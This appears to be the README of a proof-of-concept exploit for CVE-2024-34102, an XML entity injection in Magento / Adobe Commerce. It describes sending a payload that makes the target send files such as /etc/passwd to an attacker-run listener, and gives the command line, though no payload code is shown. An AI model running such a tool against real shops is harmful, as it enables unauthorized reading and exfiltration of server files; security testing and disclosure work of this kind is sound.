POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.
This POC will attempt to read files from target hosts that are vulnerable to the recent Magento / Adobe Commerce CVE-2024-34102. This POC is based on this security advisory and this research by Assetnote.
In order to run this poc, you will have to have a machine with published and accessible IP.
- Creates a local file
poc.xmlcontaining the main payloads. - Sends the payload to the target via a POST request.
- Sets up a listener on your machine for incoming GET requests from the target.
- Attempts to read files from the target (default:
/etc/passwd).
- Python 3.6 or higher
requestslibrary
To use this POC against a single target:
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)For any suggestions or thoughts, please get in touch with me.
This provided tool is for educational purposes only. I do not encourage, condone, or support unauthorized access to any system or network. Use this tool responsibly and only on systems you have explicit permission to test. Any actions and consequences resulting from misuse of this tool are your own responsibility.